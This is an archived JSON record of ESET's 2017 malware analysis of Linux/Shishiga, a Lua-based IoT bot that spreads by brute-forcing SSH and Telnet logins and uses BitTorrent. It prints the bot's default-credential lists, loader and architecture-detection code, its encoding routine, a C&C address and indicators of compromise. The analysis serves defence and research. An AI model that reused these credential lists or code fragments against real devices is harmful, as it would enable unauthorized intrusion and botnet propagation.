{
	"id": "cca4f073-5c79-43d1-8870-f0b1b4d4b9a6",
	"created_at": "2026-04-06T01:31:26.548891Z",
	"updated_at": "2026-04-10T03:24:18.185886Z",
	"deleted_at": null,
	"sha1_hash": "4b4bdc39a19179d56992dbcf93e72845ddc48bf9",
	"title": "Linux Shishiga malware using LUA scripts",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 146877,
	"plain_text": "Linux Shishiga malware using LUA scripts\r\nBy ESET ResearchMichal Malik\r\nArchived: 2026-04-06 00:31:11 UTC\r\nThe usage of the BitTorrent protocol and Lua modules separates Linux/Shishiga from other types of malware,\r\naccording to analysis by ESET.\r\n25 Apr 2017  •  , 12 min. read\r\nAmong all the Linux samples that we receive every day, we noticed one sample detected only by Dr.Web - their\r\ndetection name was Linux.LuaBot. We deemed this to be suspicious as our detection rates for the Luabot family\r\nhave generally been high. Upon analysis, it turned out that this was, indeed, a bot written in Lua, but it represents\r\na new family, and is not related to previously seen Luabot malware. Thus, we’ve given it a new name:\r\nLinux/Shishiga. It uses 4 different protocols (SSH - Telnet - HTTP - BitTorrent) and Lua scripts for modularity.\r\nHow to meet Shishiga?\r\nLinux/Shishiga targets GNU/Linux systems. Its infection vector is a very common one: bruteforcing weak\r\ncredentials based on a password list. It does this in a similar fashion to Linux/Moose with the added capability to\r\nbruteforce SSH credentials too. Here is the complete credentials list at the time of writing:\r\nbftelnet.lua\r\n[...]\r\nlocal accounts={\r\n {\"admin\",\"admin\"},\r\n {\"root\",\"root\"},\r\n {\"adm\",\"adm\"},\r\n {\"acer\",\"acer\"},\r\n {\"user\",\"user\"},\r\n {\"security\",\"security\"}\r\n}\r\n[...]\r\nbfssh.lua\r\n[...]\r\nlocal accounts={\r\n {\"admin\",\"admin\"},\r\n {\"root\",\"root\"},\r\n {\"adm\",\"adm\"},\r\n {\"ubnt\",\"ubnt\"},\r\nhttps://www.welivesecurity.com/2017/04/25/linux-shishiga-malware-using-lua-scripts/\r\nPage 1 of 15\n\n{\"root\",\"\"},\r\n {\"admin\",\"\"},\r\n {\"adm\",\"\"},\r\n {\"user\",\"user\"},\r\n {\"pi\",\"pi\"},\r\n}\r\n--[[\r\n {\"acer\",\"acer\"},\r\n {\"security\",\"security\"},\r\n {\"root\",\"toor\"},\r\n {\"root\",\"roottoor\"},\r\n {\"root\",\"password\"},\r\n {\"root\",\"test\"},\r\n {\"root\",\"abc123\"},\r\n {\"root\",\"111111\"},\r\n {\"root\",\"1q2w3e\"},\r\n {\"root\",\"oracle\"},\r\n {\"root\",\"1q2w3e4r\"},\r\n {\"root\",\"123123\"},\r\n {\"root\",\"qwe123\"},\r\n {\"root\",\"p@ssw0rd\"},\r\n {\"root\",\"1\"},\r\n {\"root\",\"12\"},\r\n {\"root\",\"123\"},\r\n {\"root\",\"1234\"},\r\n {\"root\",\"12346\"},\r\n {\"root\",\"123467\"},\r\n {\"root\",\"1234678\"},\r\n {\"root\",\"12346789\"},\r\n {\"root\",\"123467890\"},\r\n {\"root\",\"qwerty\"},\r\n {\"root\",\"pass\"},\r\n {\"root\",\"toor\"},\r\n {\"root\",\"roottoor\"},\r\n {\"root\",\"password123\"},\r\n {\"root\",\"password123456\"},\r\n {\"root\",\"pass123\"},\r\n {\"root\",\"password\"},\r\n {\"root\",\"passw0rd\"},\r\n {\"root\",\"1qaz\"},\r\n {\"root\",\"1qaz2wsx\"},\r\n {\"root\",\"asdfgh\"},\r\nhttps://www.welivesecurity.com/2017/04/25/linux-shishiga-malware-using-lua-scripts/\r\nPage 2 of 15\n\n{\"user\",\"user\"},\r\n {\"user\",\"\"},\r\n {\"acer\",\"acer\"},\r\n {\"security\",\"security\"},\r\n {\"root\",\"passw0rds\"},\r\n]]\r\n[...]\r\nWe found several binaries of Linux/Shishiga for various architectures such as MIPS (both big- and little-endian),\r\nARM (armv4l), i686, and also PowerPC. These are common for IoT devices. We think that other architectures like\r\nSPARC, SH-4 or m68k could be supported as we will explain later.\r\nShishiga’s skills\r\nLinux/Shishiga is a binary packed with UPX 3.91 (Ultimate Packer for Executables), but the UPX tool will have\r\ntrouble unpacking these binaries because Shishiga adds data at the end of the packed file.\r\nAfter unpacking, we see that it’s statically linked with the Lua runtime library and stripped of all symbols.\r\n$ file unpacked.i686.lm\r\nunpacked.i686.lm: ELF 32-bit LSB executable, Intel 80386, version 1 (GNU/Linux),\r\nstatically linked, stripped\r\nOnce executed, the binary will initialize the malware Lua module with the following methods:\r\nMalware methods\r\nmalware_module_methods dd offset aGetver ; \"getver\"\r\n dd offset getver\r\n dd offset aGetos ; \"getos\"\r\n dd offset getos\r\n dd offset aGetarch ; \"getarch\"\r\n dd offset getarch\r\n dd offset aGetmacaddr ; \"getmacaddr\"\r\n dd offset getmacaddr\r\n dd offset aGetmods ; \"getmods\"\r\n dd offset getmods\r\n dd offset aSetargs ; \"setargs\"\r\n dd offset setargs\r\nThe getmods method will return the archive blob as we will explain later. Then hardcoded Lua code\r\n( malware.lua ) is executed via the luaL_loadstring and lua_pcall functions. The Lua code is quite\r\nstraightforward, but here is a quick walkthrough of the source code without any modifications on our part.\r\nmalware.lua\r\nhttps://www.welivesecurity.com/2017/04/25/linux-shishiga-malware-using-lua-scripts/\r\nPage 3 of 15\n\nlocal unistd=require(\"posix.unistd\")\r\nrequire(\"malware\")\r\nfunction getexe()\r\n local fn=unistd.readlink(\"/proc/self/exe\")\r\n if fn==nil and arg~=nil then\r\n fn=arg[0] --symlink removed\r\n end\r\n if fn==nil then\r\n print(\"couldn't find bot file\")\r\n return nil\r\n end\r\n local file=io.open(fn,\"r\")\r\n if file==nil then\r\n print(\"couldn't find bot file\")\r\n return nil\r\n end\r\n local data=file:read(\"*all\")\r\n file:close()\r\n return data\r\nend\r\nfunction getMods()\r\n return zlib.inflate()(malware.getmods())\r\nend\r\nfunction getScriptFiles(scripts)\r\n local files={}\r\n local i=1\r\n while true do\r\n local a1,b1,c1=string.find(scripts,'%-%-script%-begin%-%-([%w%.]+)%-%-',i)\r\n if a1==nil then\r\n break\r\n end\r\n local a2,b2,c2=string.find(scripts,'%-%-script%-end%-%-([%w%.]+)%-%-',i)\r\n if a2==nil then\r\n break\r\n end\r\n if c1~=c2 then\r\n return nil\r\nhttps://www.welivesecurity.com/2017/04/25/linux-shishiga-malware-using-lua-scripts/\r\nPage 4 of 15\n\nend\r\n local src=string.sub(scripts,b1+1,a2-1)\r\n i=b2+1\r\n files[c1]=src\r\n end\r\n return files\r\nend\r\nmalware.exe=getexe() 1\r\nlocal modules=getScriptFiles(getMods()) 2\r\n[...]\r\nf=load(malware.modules['main.lua']) 3\r\nlocal s,err=pcall(f)\r\nif s==false then\r\n print(err)\r\nend\r\n(1) open the malware executable file from /proc/self/exe and return its content;\r\n(2)\r\nretrieve the zlib archive via getmods method, decompresses it, then parse it using tags and store it in a\r\nLua’s array;\r\n(3) call main.lua module;\r\nThere is an exhaustive list of all Lua scripts found in the IoCs section. Most of them have self-explanatory\r\nfilenames, but here is a brief summary of some of them.\r\ncallhome.lua\r\nretrieve the configuration file server.bt or servers from config.lua ;\r\nif unable to reach the current default server, change to a different server;\r\nsend files (reports or accounts, both JSON formatted);\r\nexecute tasks from task list retrieved from the C\u0026C server;\r\nbfssh.lua / bftelnet.lua\r\nmodule to bruteforce SSH and Telnet logins;\r\ncheck if the command echo -en \"\\\\x31\\\\x33\\\\x33\\\\x37\" outputs 1337 ; if not, exit else continue;\r\ndevice architecture is determined from the /bin/ls file by running cat /bin/ls and parsing the ELF\r\nheader, see below;\r\nspread the malware (both .lm and .dm  files) according to the device architecture;\r\nsave successful credentials;\r\nThe architecture checking code is as follows:\r\nhttps://www.welivesecurity.com/2017/04/25/linux-shishiga-malware-using-lua-scripts/\r\nPage 5 of 15\n\nbfssh.lua, getArchELF method\r\nfunction bfssh.getArchELF(text)\r\nlocal bits,denc,ver,ftype,farch\r\nif text==nil then\r\nreturn nil\r\nend\r\nlocal i=text:find(\"\\x7fELF\") 1\r\nif i~=nil then\r\nbits,denc,ver=string.unpack(\"\u003cBBB\",text:sub(i+4))\r\nif denc==1 then\r\nftype,farch=string.unpack(\"\u003cHH\",text:sub(i+16)) 2\r\nelse\r\nftype,farch=string.unpack(\"\u003eHH\",text:sub(i+16))\r\nend\r\nend\r\nreturn bits,denc,farch 3\r\nend\r\n(1) every ELF file has to start with \\x7fELF\r\n(2) ftype that represents e_type (ELF file type = executable, shared etc.) is not used\r\n(3)\r\nbits represents e_ident[EI_CLASS] (32-bit or 64-bit), denc represents e_ident[EI_DATA] (little\r\nor big endian), and farch represents e_machine in the ELF header\r\nbfssh.lua, getArchName method\r\nfunction bfssh.getArchName(bits,denc,farch) 1\r\n if farch==0x8 and denc==1 then 2\r\n return \"mipsel\"\r\n end\r\n if farch==0x8 and denc==2 then\r\n return \"mips\"\r\n end\r\n if farch==0x28 then\r\n return \"armv4l\"\r\n end\r\n if farch==0x2 then\r\n return \"sparc\"\r\n end\r\nhttps://www.welivesecurity.com/2017/04/25/linux-shishiga-malware-using-lua-scripts/\r\nPage 6 of 15\n\nif farch==0x2a then\r\n return \"sh4\"\r\n end\r\n if farch==0x4 then\r\n return \"m68k\"\r\n end\r\n if farch==0x14 then\r\n return \"powerpc\"\r\n end\r\n if farch==0x3 or farch==0x7 or farch==0x3e then 3\r\n return \"i686\"\r\n end\r\n return nil\r\nend\r\n(1) bits is not used\r\n(2)\r\ncheck if file is for MIPS little endian ( e_machine == EM_MIPS and e_ident[EI_DATA] ==\r\nELFDATA2LSB )\r\n(3)\r\ncheck if file is for Intel 80386 or Intel 80860 or AMD x86-64 ( e_machine == EM_386 or e_machine\r\n== EM_860 or e_machine == EM_X86_64 )\r\nconfig.lua\r\ncontains publicKey to verify the signature of the binary (.lm or .dm);\r\ncontains bootstrap nodes list;\r\ncontains filenames of .bt files, port numbers of SOCKS and HTTP server;\r\ncontains IP address of the server (probably C\u0026C server);\r\npersist.lua\r\npersistence method depending on the privilege (root or user)\r\nscanner.lua\r\nused to generate random /16 networks that are not local\r\nworm.lua (this script was removed in the latest version of Linux/Shishiga)\r\nallows scanning on a given port;\r\nhttps://www.welivesecurity.com/2017/04/25/linux-shishiga-malware-using-lua-scripts/\r\nPage 7 of 15\n\nallows upload;\r\ngets information from the new infected server;\r\nThe readme.lua script has a message banner that grabs your attention, if you speak Russian:\r\n ВСЁ ИДЁТ ПО ПЛАНУ\r\nА при коммунизме всё будет заебись\r\nОн наступит скоро — надо только подождать\r\nТам всё будет бесплатно,там всё будет в кайф\r\nТам наверное вощще не надо будет (умирать)\r\nЯ проснулся среди ночи и понял, что -\r\n ВСЁ ИДЁТ ПО ПЛАНУ\r\nThis translates to:\r\n EVERYTHING GOES ACCORDING TO PLAN\r\nWhen we get communism it'll all be fucking great.\r\nIt will come soon, we just have to wait.\r\nEverything will be free there, everything will be fun.\r\nWe'll probably not even have to die.\r\nI woke up in the middle of the night and realized\r\n EVERYTHING GOES ACCORDING TO PLAN\r\nIt seems that the malware author was inspired by E.Letov and his album Everything goes according to plan -\r\nsee the last verse of the title song.\r\nOver the past few weeks, we observed some minor changes like parts of some modules being rewritten, addition\r\nof testing modules, removal of redundant files, but nothing especially noteworthy.\r\nWhile the main binary is named \u003carchitecture\u003e.lm , we also managed to retrieve binaries with the following\r\nname \u003carchitecture\u003e.dm  - a simple backdoor that listens on 0.0.0.0 (all IPv4 addresses) port 2015 . One of\r\nthe small changes was in the name of this backdoor binary - it changed from dl to dm .\r\nShishiga communication\r\nLinux/Shishiga can communicate using any of the modules httpproto.lua , btloader.lua or server.lua .\r\nThe httpproto.lua module has functions that allow the given data to be encoded or decoded, and make HTTP\r\nPOST and GET requests. The source code below shows the process of encoding data.\r\nhttpproto.lua\r\nhttps://www.welivesecurity.com/2017/04/25/linux-shishiga-malware-using-lua-scripts/\r\nPage 8 of 15\n\n[...]\r\nfunction httpproto.encode(data)\r\n local msg=bencode.encode(data)\r\n local c=zlib.crc32()(msg)\r\n local k=string.pack(\"\u003cI\",utils.random())\r\n return k..crypto.rc4(k,string.pack(\"\u003cI\",c)..msg)\r\nend\r\n[...]\r\nbtloader.lua uses the torrent.lua module (a wrapper for BitTorrent functions) to save or load nodes from\r\nthe nodes.cfg file. It also retrieves its configuration data from {server,update,script}.bt files (in Bencode\r\nformat) and uses the BitTorrent protocol to check for new versions of these files. script.bt allows the execution\r\nof a Lua script and update.bt allows executing the .lm binary. Below are examples of decoded .bt files shown\r\nas Python dictionaries.\r\nscript.bt\r\n{\r\n 'sig': \u003cremoved\u003e,1\r\n 'k': \u003cremoved\u003e,2\r\n 'salt': 'script',\r\n 'seq': 1486885364,\r\n 'v': 'caba4dbe2f7add9371b94b97cf0d351b72449072,test.lua\\n'\r\n}\r\n(1) signature\r\n(2) public key\r\nupdate.bt\r\n{\r\n 'sig': \u003cremoved\u003e,\r\n 'k': \u003cremoved\u003e,\r\n 'salt': 'update',\r\n 'seq': 1486885364,\r\n 'v':\r\n 'bf4d9e25fc210a1d9809aebb03b30748dd588d08,mipsel.lm\\n\r\n 8a0d58472f6166ade0ae677bab7940fe38d66d35,armv4l.lm\\n\r\n 51a4ca78ebb0649721ae472290bea7bfe983d727,mips.lm\\n\r\n 979fb376d6adc65473c4f51ad1cc36e3612a1e73,powerpc.lm\\n\r\n ce4b3c92a96137e6215a5e2f5fd28a672eddaaab,i686.lm\\n'\r\n}\r\nhttps://www.welivesecurity.com/2017/04/25/linux-shishiga-malware-using-lua-scripts/\r\nPage 9 of 15\n\nserver.bt\r\n{\r\n 'sig': \u003cremoved\u003e,\r\n 'k': \u003cremoved,\r\n 'salt': 'server',\r\n 'seq': 1486835166,\r\n 'v': '93.117.137.35:8080\\n'\r\n}\r\nFinally, the  server.lua module’s main functionality is to create an HTTP server with the port defined in\r\nconfig.lua . In all samples we have analyzed so far, that is port 8888.\r\nThe server responds only to /info and /upload requests. Below is a (prettified) version of the server response\r\nto the /info path. All of the files below can be easily downloaded from the infected device.\r\n{\r\n \"src\":[ 1\r\n \"test.lua\",\r\n \"test1.lua\",\r\n \"test10.lua\",\r\n \"test2.lua\",\r\n \"test3.lua\",\r\n \"test5.lua\",\r\n \"test6.lua\",\r\n \"test_1.lua\",\r\n \"test_2.lua\",\r\n \"test_3.lua\",\r\n \"test_4.lua\"\r\n ],\r\n \"dm\":[ 2\r\n \"armv4l.dm\",\r\n \"i686.dm\",\r\n \"mips.dm\",\r\n \"mipsel.dm\"\r\n ],\r\n \"bt\":[ 3\r\n \"script.bt\",\r\n \"server.bt\",\r\n \"update.bt\"\r\n ],\r\n \"version\":\"1.0.0\", 4\r\nhttps://www.welivesecurity.com/2017/04/25/linux-shishiga-malware-using-lua-scripts/\r\nPage 10 of 15\n\n\"lua\":[ 5\r\n \"armv4l.lm\",\r\n \"i686.lm\",\r\n \"mips.lm\",\r\n \"mipsel.lm\",\r\n \"powerpc.lm\"\r\n ],\r\n \"os\":\"lin\",\r\n \"arch\":\"i686\",\r\n \"lua_version\":\"Lua 5.3\"\r\n}\r\n(1) Lua scripts\r\n(2) backdoor (old name: .dl )\r\n(3) BitTorrent scripts\r\n(4) malware version\r\n(5) modules loader\r\nQuerying the root / on port 8888 will result in HTTP/1.0 404 OK , which serves as a simple indicator of\r\ncompromise (IoC).\r\nhttp.lua response function\r\nfunction http.response(req,code,data,timeout)\r\n timeout=timeout or timeoutDef\r\n local hdr=\"HTTP/1.0 %d OK\\r\\nContent-Length: %d\\r\\nConnection: close\\r\\n\\r\\n\"\r\n async.sendall(req.sock,hdr:format(code,data:len())..data,timeout)\r\n return true\r\nend\r\nAt this point in our investigation, we asked the Censys team to do a mass scan of the Internet on TCP port 8888.\r\nThey found about 10 IP addresses that match this particular HTTP answer. These IP addresses are potentially\r\ninfected machines.\r\nConclusion\r\nAt a first glance, Linux/Shishiga might appear to be like the others, spreading through weak Telnet and SSH\r\ncredentials, but the usage of the BitTorrent protocol and Lua modules separates it from the herd. BitTorrent used\r\nin a Mirai-inspired worm, Hajime, was observed last year and we can only speculate that it might become more\r\npopular in the future.\r\nhttps://www.welivesecurity.com/2017/04/25/linux-shishiga-malware-using-lua-scripts/\r\nPage 11 of 15\n\nIt’s possible that Shishiga could still evolve and become more widespread but the low number of victims, constant\r\nadding, removing, and modifying of the components, code comments and even debug information, clearly\r\nindicate that it’s a work in progress. To prevent your devices from being infected by Shishiga and similar worms,\r\nyou should not use default Telnet and SSH credentials.\r\nWe would like to thank the Censys team for their collaboration.\r\nIoCs\r\nC\u0026C\r\n93.117.137.35\r\nSHA-1 hashes (.lm)\r\n003f548796fb52ad281ae82c7e0bb7532dd34241\r\n1a79092c6468d39a10f805c96ad7f8bf303b7dc8\r\n1cc1b97f8f9bb7c4f435ef1316e08e5331b4331b\r\n2889803777e2dfec7684512f45e87248a07d508f\r\n2a809d37be5aa0655f5cc997eb62683e1b45da17\r\n3f1ef05ca850e2f5030ee279b1c589c9e3cc576c\r\n41bf0d5612ba5bc9a05e9d94df0f841b159264a0\r\n4bc106f6231daa6641783dd9276b4f5c7fc41589\r\n4d55efe18643d7408cbe12dd4f319a68084bd11e\r\n4df58ab26f0fc8ec2d1513611ca2b852e7107096\r\n51a4ca78ebb0649721ae472290bea7bfe983d727\r\n5a88b67d8dfaf1f68308311b808f00e769e39e46\r\n6458c48e5167a2371d9243d4b47ad191d642685b\r\n688ccbca8b2918a161917031e21b6810c59eeab0\r\n6e3ba86d1f91669e87945b8ea0211b58e315e189\r\n6f41c8f797814e2e3f073601ce81e8adceef6a27\r\n8a0d58472f6166ade0ae677bab7940fe38d66d35\r\n8a1f9212f181e68a63e06a955e64d333b78c6bf6\r\n8e3c4eb04d4cfd8f44c721111c5251d30ac848b6\r\n979fb376d6adc65473c4f51ad1cc36e3612a1e73\r\na1f2535576116d93b62d7f5fc6e30e66e0e0a216\r\na694c6ecc2ff9702905f22b14ed448e9e76fe531\r\nac094b239851eaf2e9fd309285c0996fb33771a8\r\nb14f7af9665ef77af530109a0331f8ca0bd2a167\r\nb86935c4539901cdec9081d8a8ca915903adaff1\r\nba5df105496b0c4df7206d29fa544b7a7a346735\r\nbf4d9e25fc210a1d9809aebb03b30748dd588d08\r\nc22f0fb01c6d47957732a8b0f5ef0f7d4e614c79\r\nce4b3c92a96137e6215a5e2f5fd28a672eddaaab\r\nd8a5d9c4605b33bd47fedbad5a0da9928de6aa33\r\nf73022a4801e06d675e5c3011060242af7b949ad\r\nhttps://www.welivesecurity.com/2017/04/25/linux-shishiga-malware-using-lua-scripts/\r\nPage 12 of 15\n\nSHA-1 hashes (.dl)\r\n274181d2f9c6b8f0e217db23f1d39aa94c161d6e\r\n8abbb049bffd679686323160ca4b6a86184550a1\r\n95444c2ccc5fff19145d60f1e817fd682cabe0cd\r\n9cde845852653339f67667c2408126f02f246949\r\nLua’s scripts filename\r\nasync.lua\r\nasync.lua.old\r\nbencode.lua\r\nbfssh.lua\r\nbfssh.lua.old2\r\nbftelnet.lua\r\nbtloader.lua\r\ncallhome.lua\r\ncallhome.lua.old\r\nconfig.lua\r\ncrypto.lua\r\ndht.lua\r\nevent.lua\r\nevs.lua\r\nhttp.lua\r\nhttpproto.lua\r\nlibevent2.lua\r\nluaevent.lua\r\nmain.lua\r\nmain2.lua\r\nmalware.lua\r\npersist.lua\r\nreadme.lua\r\nrouting.lua\r\nscanner.lua\r\nscanner2.lua\r\nserver.lua\r\nsocket.lua\r\nsocks.lua\r\nssh.lua\r\nssl.lua\r\ntelnet.lua\r\ntest.lua\r\ntest1.lua\r\ntest10.lua\r\ntest2.lua\r\ntest3.lua\r\nhttps://www.welivesecurity.com/2017/04/25/linux-shishiga-malware-using-lua-scripts/\r\nPage 13 of 15\n\ntest5.lua\r\ntest6.lua\r\nthreads.lua\r\ntorrent.lua\r\nudp.lua\r\nutils.lua\r\nworm.lua\r\nFiles that could potentially indicate an infection\r\n/tmp/.local/*\r\n/tmp/drop\r\n/tmp/srv\r\n$HOME/.local/ssh.txt\r\n$HOME/.local/telnet.txt\r\n$HOME/.local/nodes.cfg\r\n$HOME/.local/check\r\n$HOME/.local/script.bt\r\n$HOME/.local/update.bt\r\n$HOME/.local/server.bt\r\n$HOME/.local/syslog\r\n$HOME/.local/syslog.pid\r\n$HOME/.local/{armv4l,i686,mips,mipsel}.dm\r\n$HOME/.local/{armv4l,i686,mips,mipsel,powerpc}.lm\r\n/etc/rc2.d/S04syslogd\r\n/etc/rc3.d/S04syslogd\r\n/etc/rc4.d/S04syslogd\r\n/etc/rc5.d/S04syslogd\r\n/etc/init.d/syslogd\r\n/bin/syslogd\r\n/etc/cron.hourly/syslogd\r\nLet us keep you\r\nup to date\r\nSign up for our newsletters\r\nhttps://www.welivesecurity.com/2017/04/25/linux-shishiga-malware-using-lua-scripts/\r\nPage 14 of 15\n\nDiscussion\r\nSource: https://www.welivesecurity.com/2017/04/25/linux-shishiga-malware-using-lua-scripts/\r\nhttps://www.welivesecurity.com/2017/04/25/linux-shishiga-malware-using-lua-scripts/\r\nPage 15 of 15",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"references": [
		"https://www.welivesecurity.com/2017/04/25/linux-shishiga-malware-using-lua-scripts/"
	],
	"report_names": [
		"linux-shishiga-malware-using-lua-scripts"
	],
	"threat_actors": [
		{
			"id": "eb3f4e4d-2573-494d-9739-1be5141cf7b2",
			"created_at": "2022-10-25T16:07:24.471018Z",
			"updated_at": "2026-04-10T02:00:05.002374Z",
			"deleted_at": null,
			"main_name": "Cron",
			"aliases": [],
			"source_name": "ETDA:Cron",
			"tools": [
				"Catelites",
				"Catelites Bot",
				"CronBot",
				"TinyZBot"
			],
			"source_id": "ETDA",
			"reports": null
		}
	],
	"ts_created_at": 1775439086,
	"ts_updated_at": 1775791458,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/4b4bdc39a19179d56992dbcf93e72845ddc48bf9.pdf",
		"text": "https://archive.orkl.eu/4b4bdc39a19179d56992dbcf93e72845ddc48bf9.txt",
		"img": "https://archive.orkl.eu/4b4bdc39a19179d56992dbcf93e72845ddc48bf9.jpg"
	}
}